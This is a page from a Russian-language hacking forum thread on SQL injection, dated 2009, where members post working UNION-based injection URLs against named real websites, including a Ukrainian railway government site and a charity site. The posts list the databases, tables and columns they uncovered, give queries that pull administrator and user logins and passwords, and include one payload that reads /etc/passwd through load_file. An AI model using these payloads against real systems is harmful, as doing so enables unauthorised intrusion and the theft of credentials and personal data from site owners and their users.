ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу SQL Инъекции
   
Ответ
Страница 1130 из 1242 « Первая < 130630103010801120 1126 1127 1128 1129 1130 1131 1132 1133 1134 114011801230 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #11291  
Старый 28.11.2009, 22:20
Аватар для Pr0mo
Pr0mo
Новичок
Регистрация: 26.11.2009
Сообщений: 20
Провел на форуме:
88440

Репутация: 60
По умолчанию
-1-
target : hana-g.com
Exploit: http://hana-g.com/pay.php?id=2&order=1+AND+1=2+UNION+SELECT+0,null,2 ,3,4--
Database : d031f18ydb1
User : d031f18y@localhost
Version : 5.1.36-community-log
Contain :
[0]area: area_id,area_name,order,enabled,upd_date,ins_date
[1]card_data: cdat_id,ctyp_id,prg_id,cnt_id,id,password,price,po int,flag,insert_time,use_time,card_number,etc,env
[2]card_price: prg_id,ctyp_id,price,enabled
[3]card_type: ctyp_id,ctyp_name,sname,chr,chr2,order,enabled,upd _date,ins_date
[4]ccheck_sid: sid,prg_id,cnt_id,price,card_number,time
[5]center: cnt_id,prg_id,cnt_name,alph_name,area_id,order,ena bled,tel,bank1,bank2,bank3,bank4,credit_val_zero,c redit_val_mobile,upd_date,ins_date,abt_cnt_id
[6]prefecture: id,name
[7]pricashop: htencd,htenko,prefecture,city,shopname,tel,town,ad dress,route,opens,closes,holiday,hanaf,hitof,manif ,purf,adry
[8]pricashop_old: htencd,htenko,prefecture,city,shopname,tel,town,ad dress,route,opens,closes,holiday,hanaf,hitof,manif ,purf,adry
[9]program: prg_id,prg_name,sname,sname2,order,man_info,woman_ info,woman_minfo,enabled,upd_date,ins_date,abt_prg _id
[10]rog: rogid,rognm,rog1,rog2,insdt,upddt
[11]settings: key,value
Example:
http://hana-g.com/pay.php?id=2&order=1+AND+1=2+UNION+SELECT+0,concat (cdat,0x3a,ctyp_id,0x3a,id,0x3a,password),2,3,4+fr om+card_data--


-2-
target : www.goldpoint.com.ar
Exploit: http://www.goldpoint.com.ar/producto.php?id=67/**/and/**/1=2/**/union/**/select/**/1,2,3,null,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 ,20,21,22,23,24,25,26--
Database : ingelec_mailing
User : ingelec@localhost
Version : 5.0.85-community
Contain :
[0]news_emails: email_id,email_title,email_subject,email_body,emai l_identity
[1]news_files: file_id,file_newsletter,file_file
[2]news_groups: group_id,group_code,group_title,group_identity,gro up_date,group_description,group_system,group_publi c
[3]news_history: history_id,history_newsletter,history_user,history _name,history_email,history_status,history_date,hi story_group
[4]news_identities: person_id,person_name,person_email,person_signatur e,person_signature_html,person_phone,person_protec t
[5]news_newsletters: newsletter_id,newsletter_code,newsletter_problem,n ewsletter_group,newsletter_title,newsletter_date,n ewsletter_body_txt,newsletter_body_html,newsletter _sent,newsletter_overwrite,newsletter_signature,ne wsletter_from,newsletter_from_name,newsletter_misc _history,newsletter_misc_identity2,newsletter_misc _signature
[6]news_users: user_id,user_status,user_confirm,user_group,user_d ate,user_name,user_email,user_type,user_company,us er_address,user_city,user_state,user_zip,user_coun try,user_phone,user_fax,user_site,user_im_yahoo,us er_im_msn,user_im_icq,user_im_aol,last_name,referr er,level
[7]news_vars: name,value
[8]site_mb_msg: msg_id,msg_type,msg_user,msg_date,msg_title,msg_fr om,msg_to,msg_body,msg_new,msg_delete
[9]site_user_notes: note_id,note_title,note_body,note_relation,note_ty pe,note_post_date,note_post_ip,note_post_user
[10]site_users: user_id,user_login,user_password,user_name,user_ad dress,user_city,user_state,user_zip,user_country,u ser_phone,user_email,user_email2,user_im_aol,user_ im_icq,user_im_msn,user_im_yahoo,user_im_other,use r_status,user_level,user_pending,user_date,last_lo gin,last_ip,user_msg_send,user_msg_subject,user_pr otect_delete,user_protect_edit,user_group,user_rol e
[11]site_vars: id,name,value
Example:
http://www.goldpoint.com.ar/producto.php?id=67/**/and/**/1=2/**/union/**/select/**/1,2,3,concat(user_login,0x3a,user_password),5,6,7, 8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,2 5,26+from+ingelec_mailing.site_users--



-3-
target : www.vivliokritiki.gr
Exploit: www.vivliokritiki.gr/title.php?id=6+AND+1=2+UNION+SELECT+0,null,2,3,4,5 ,6,7,8,9,10,11--
Database : vivlio
User : vivliokritiki@cgi0506.int.bizland.net
Version : 5.0.83-log
Contain :
[0]administrator: name,password
[1]author: id,fname,lname
[2]authorTitle: id,tid,aid
[3]category: id,name
[4]comments: id,tid,name,email,postdate,comments
[5]guestBook: id,name,email,postdate,comments
[6]publisher: id,house,address
[7]publisherTitle: id,pid,tid,pdate,price,pages
[8]title: id,cid,name,review,subtitle,reviewer
[9]users: id,fname,lname,email,password,comments
[10]verification: id,value
Example:
http://www.vivliokritiki.gr/title.php?id=6+AND+1=2+UNION+SELECT+0,concat(name, 0x3a,password),2,3,4,5,6,7,8,9,10,11+from+administ rator--



-4-
target : www.hemasolutions.com
Exploit: http://www.hemasolutions.com/query.php?id=13+AND+1=2+UNION+SELECT+0,null,2,3,4, 5,6,7,8,9--
Databases :
  • hemasol_acc
  • hemasol_balkan
  • hemasol_balkanforum
  • hemasol_calculators
  • hemasol_hema
  • hemasol_leather
  • hemasol_mall
  • hemasol_vioenergy
  • hemasol_viva
  • hemasol_widget
User : hemasol@localhost
Version : 5.0.81-community-log
Contain (hemasol_hema) :
[0]downloaded: downloaded_id,downloaded_date,downloaded_file,down loaded_ip
[1]downloads: downloads_id,downloads_name,downloads_lang,downloa ds_version,downloads_date,downloads_av,downloads_s rc,downloads_file,downloads_ext
[2]faqs: faqs_id,faqs_date,faqs_question,faqs_answer
[3]news: news_id,news_date,news_head,news_body,news_image,n ews_image_ext,news_lang
[4]plans: plans_id,plans_owner,plans_template,plans_src,plan s_date,plans_disp_style
[5]pools: pools_id,pools_date,pools_ip,pools_q1,pools_a1,poo ls_q2,pools_a2,pools_q3,pools_a3
[6]queries: queries_id,queries_owner,queries_date,queries_temp late,queries_args,queries_result
[7]questions: questions_id,questions_name,questions_email,questi ons_date,questions_topic,questions_text
[8]requests: requests_id,requests_date,requests_name1,requests_ name2,requests_title,requests_email,requests_compa ny,requests_address,requests_city,requests_state,r equests_post,requests_country,requests_page,reques ts_info
[9]reviews: reviews_id,reviews_date,reviews_head,reviews_body, reviews_lang,reviews_author,reviews_email,reviews_ rating,reviews_approved,reviews_company
[10]templates: templates_id,templates_name,templates_lang,templat es_group,templates_owner,templates_email,templates _xml,templates_creation,templates_used,templates_a ctive
[11]users: users_id,users_name,users_pass,users_desc,users_co untry,users_city,users_address,users_tel,users_ema il,users_website,users_ip,users_lang,users_plans_l eft,users_download_allowed,users_created,users_act ive,users_agree
[12]webmasters: webmasters_id,webmasters_name,webmasters_site,webm asters_ip,webmasters_css,webmasters_lang,webmaster s_templates,webmasters_plans_left,webmasters_creat ed
[13]webplans: webplans_id,webplans_owner,webplans_user,webplans_ template,webplans_short,webplans_src,webplans_date
Example:
http://www.hemasolutions.com/query.php?id=13+AND+1=2+UNION+SELECT+0,concat(user s_name,0x3a,users_pass),2,3,4,5,6,7,8,9+from+hemas ol_hema.users--
Последний раз редактировалось Pr0mo; 29.11.2009 в 23:05..
 
Ответить с цитированием

  #11292  
Старый 28.11.2009, 23:22
Аватар для Strilo4ka
Strilo4ka
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
Провел на форуме:
3363660

Репутация: 1148
По умолчанию
ТИЦ: 50
PR: 4

Цитата:
http://www.billiard.net.ua/documents.php?id=-1474+union+select+1,2,3,4,concat_ws(0x40,user(),da tabase(),version(),@@version_compile_os),6,7,8/*
u_billiard@localhost@billiard@4.1.22-log@pc-linux-gnu

эротический масаж
Цитата:
http://nefertiti.net.ua/index.php?p=-1+union+select+1,2,3,4,concat_ws(0x3a,version(),da tabase(),user(),@@version_compile_os)--+&id=&lang=eng
.0.22:nefer_vladimir:nefer_vladimir@localhost:unkn own-freebsd6.0

Цитата:
http://nefertiti.net.ua/index.php?p=-1%20union%20select%201,2,GROUP_CONCAT(TABLE_NAME%2 0SEPARATOR%200x40),4,5%20FROM%20information_schema .TABLES%20where%20TABLE_SCHEMA=0x6e656665725f766c6 164696d6972--%20&id=&lang=rus
MENU@category@config@config_cat@item@main

Цитата:
http://nefertiti.net.ua/index.php?p=-1%20union%20select%201,2,GROUP_CONCAT(COLUMN_NAME% 20SEPARATOR%200x40),4,5%20FROM%20information_schem a.COLUMNS%20WHERE%20TABLE_NAME=0x4d454e55--%20&id=&lang=rus
атрибуты

menu:
idmenu@item@mat_id@root_id@por@item_ukr@item_eng@t ype

category:
cat_id@root_cat@name_cat@descr@sh_descr@img@por

config:
name_site@description@adminlogin@adminpass@id@meta

config_cat:
item_per_page@i_shop@email@add_img@money@id

item:
id@id_category@title@description@sh_description@pr ice@hits@money_type@print_to_index@img@ad_img

main:
d@name@info@info_ukr@info_eng
Последний раз редактировалось Strilo4ka; 29.11.2009 в 01:50..
 
Ответить с цитированием

  #11293  
Старый 29.11.2009, 20:52
Аватар для Gorev
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию
http://www.bizarresoft.ro/produse_detalii.php?produs=-15+union+select+1,2,concat_ws(0x3a,version(),datab ase(),user(),@@version_compile_os),4,5,6,7,8,9,10, 11,12,13,14

Database Version: 5.0.85-community-log
Database name: bizarres_bizarres
User name: bizarres_barabum@localhost
Os : pc-linux-gnu
 
Ответить с цитированием

  #11294  
Старый 30.11.2009, 01:26
Аватар для Bb0y
Bb0y
Участник форума
Регистрация: 30.10.2009
Сообщений: 103
Провел на форуме:
736224

Репутация: 388
Отправить сообщение для Bb0y с помощью ICQ Отправить сообщение для Bb0y с помощью Yahoo
По умолчанию
http://www.stimul-n.bg/site/advert.php?id=-4+union+select+1,2,group_concat(0x0b,column_name)+ from+information_schema.columns+where+table_name=0 x7573657273
users::id:user,pass:emailerm
http://www.stimul-n.bg/site/advert.php?id=-4+union+select+1,2,group_concat(0x0b,id,0x3a,user, 0x3a,pass,0x3a,email,0x3a,perm)+from+users
MySQL MySQL 5.0.32-Debian_7etch1-log
================================================== ========
http://ovbot.com/go.php?id=-4+union+select+group_concat(0x0b,column_name)+from +information_schema.columns+where+table_name=0x777 05f7573657273
wp_users:: ID, user_login, user_pass, user_nicename, user_email, user_url, user_registered, user_activation_key, user_status, display_name
http://ovbot.com/go.php?id=-4+union+select+group_concat(0x0b,ID,0x3a, user_login,0x3a, user_pass,0x3a,user_email)+from+wp_users
MySQL 5.0.81-community
 
Ответить с цитированием

  #11295  
Старый 30.11.2009, 02:49
Аватар для Strilo4ka
Strilo4ka
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
Провел на форуме:
3363660

Репутация: 1148
По умолчанию
ZAXID.NET
Цитата:
http://chat.zaxid.net/index.php?action=zvit&cid=-38+union+select+1,concat_ws(0x3a,user(),database() ,version(),@@version_compile_os),3,4,5--+
user:chatzaxid@localhost
DB:chatzaxid
version:5.1.37-log
OS:unknown-linux-gnu

Цитата:
http://chat.zaxid.net/index.php?action=zvit&cid=-38+union+select+1,%20GROUP_CONCAT(TABLE_NAME),3,4, 5+FROM+information_schema.TABLES+WHERE+TABLE_SCHEM A=0x636861747a61786964--+
нашы таблички:
Код:
banerz,banerz_groups,banerz_specials,banners,confdisclaimers,conferences,confusers,qa,urights
атрибуты confusers:
Код:
uid,unick,upib,uemail,uicq,uworkplace,uposada,upass,banned
пользователи:

Цитата:
http://chat.zaxid.net/index.php?action=zvit&cid=-38+union+select+1,GROUP_CONCAT(concat_ws(0x3a,uid, unick,upib,uemail,uicq,uworkplace,uposada,upass,ba nned)+SEPARATOR+0x40),3,4,5+FROM+confusers--+
Всего 1595 пользователя!!!
Последний раз редактировалось Strilo4ka; 30.11.2009 в 03:10..
 
Ответить с цитированием

  #11296  
Старый 30.11.2009, 18:46
Аватар для edge911
edge911
Участник форума
Регистрация: 21.02.2009
Сообщений: 228
Провел на форуме:
2175726

Репутация: 368
По умолчанию
Цитата:
http://www.medialaw.kz/index.php?r=-1+union+select+concat_ws(version(),database(),user ()),2%20--
------
 
Ответить с цитированием

  #11297  
Старый 30.11.2009, 22:18
Аватар для Strilo4ka
Strilo4ka
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
Провел на форуме:
3363660

Репутация: 1148
По умолчанию
Официальный сайт Южной железной дороги!
вывод в теге <title>

В даному случае скуль в оракле!

Цитата:
http://www.pz.gov.ua/dept/dept.php?lid=1&mid=-2511+union+select+table_name+from+sys.all_tables--+
таблица AAABBB

Oracle
Цитата:
http://www.pz.gov.ua/dept/dept.php?lid=1&mid=-2511+union+select+user+from+sys.user_tables--+
пользователь PZ

Цитата:
http://www.pz.gov.ua/dept/dept.php?lid=1&mid=-2511+union+select+tablespace_name+from+sys.user_ta bles--+
PZTAB

пользователи
Код:
OUTLN
SYS
DBSNMP
...
таблицы системного пользователя SYS
Код:
Dual
AUDIT_ACTIONS
доступ до DBA_USERS для пользователя под которым работает скрипт закрыт.

Код:
всесто limit rownum
кавычки екранируються
в запросе в скрыпте  один атрибут
склейка так атрибут||chr(симовл асци)||..||..||..
Последний раз редактировалось Strilo4ka; 30.11.2009 в 22:30..
 
Ответить с цитированием

  #11298  
Старый 01.12.2009, 18:40
Аватар для Bramin
Bramin
Участник форума
Регистрация: 15.05.2009
Сообщений: 111
Провел на форуме:
1179199

Репутация: 127
Отправить сообщение для Bramin с помощью ICQ
По умолчанию
http://aquatoriya.org/news.php?id=-5+union+select+1,2,group_concat(table_name),4,5,6+ from+information_schema.tables--

http://www.photobooth.net/art/index.php?artistID=-21+union+select+1,2,3,4,5,6,7,load_file(0x2F657463 2F706173737764),9--
Последний раз редактировалось Bramin; 02.12.2009 в 19:03..
 
Ответить с цитированием

  #11299  
Старый 01.12.2009, 18:52
Аватар для KNR
KNR
Новичок
Регистрация: 30.10.2009
Сообщений: 21
Провел на форуме:
182669

Репутация: 24
По умолчанию
http://www.cfess.org.br/noticias_res.php?id=-22+UNION+SELECT+1,concat_ws(0x3a,version(),user(), database()),3,4,5,6,7,8,9,10,11,12/*
Последний раз редактировалось KNR; 01.12.2009 в 18:54..
 
Ответить с цитированием

  #11300  
Старый 02.12.2009, 03:42
Аватар для Strilo4ka
Strilo4ka
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
Провел на форуме:
3363660

Репутация: 1148
По умолчанию
Цитата:
http://catalog.arena-bel.ru/index.php?id=-271+union+select+1,2,concat_ws(0x3a,version(),data base(),user(),@@version_compile_os),4,5--+&s=0
5.0.87-log:catalogarenabel:catalogarenabel@localhostort bld-freebsd7.2
Код:
partnerstehno_backs@partnerstehno_banners@partnerstehno_chapters@partnerstehno_counts@partnerstehno_cp_clons@partnerstehno_cp_links@partnerstehno_cp_linkstoclons@partnerstehno_letters@partnerstehno_links@partnerstehno_linkstocp@partnerstehno_scheduler@partnerstehno_templates@tehno_backs@tehno_banners@tehno_chapters@tehno_counts@tehno_cp_clons@tehno_cp_links@tehno_cp_linkstoclons@tehno_letters@tehno_links@tehno_linkstocp@tehno_scheduler@tehno_templates
Цитата:
http://alpha-avizo.com/index.php?page=search&id=B2'&type=3+union+select+1 ,2,3,4,5,6,7,8,9,10--+
5.0.77:alphaav_bp:alphaav_dhsilabs@localhostortb ld-freebsd6.4
tables:
Код:
category@prop
prop columns:
Код:
no@dt@id@org@name@phone@email@typ@txt@conf
category columns:
Код:
id@cat@des

Цитата:
http://www.catholiccharitiesdc.org/find/services/index.php?id=-156+union+select+1,2,3,concat_ws(0x3a,version(),da tabase(),user(),@@version_compile_os),5,6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22,23,24--+
5.0.77:ccs-dc_org:ccsdc@rh7.axion-it.com:redhat-linux-gnu

таблицы
content@session@user@version_link

атрибуты user

user_id@email@name@password@password_change@passwo rd_forgot_key@password_forgot_key_expire
Последний раз редактировалось Strilo4ka; 02.12.2009 в 15:00..
 
Ответить с цитированием
Ответ
Страница 1130 из 1242 « Первая < 130630103010801120 1126 1127 1128 1129 1130 1131 1132 1133 1134 114011801230 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ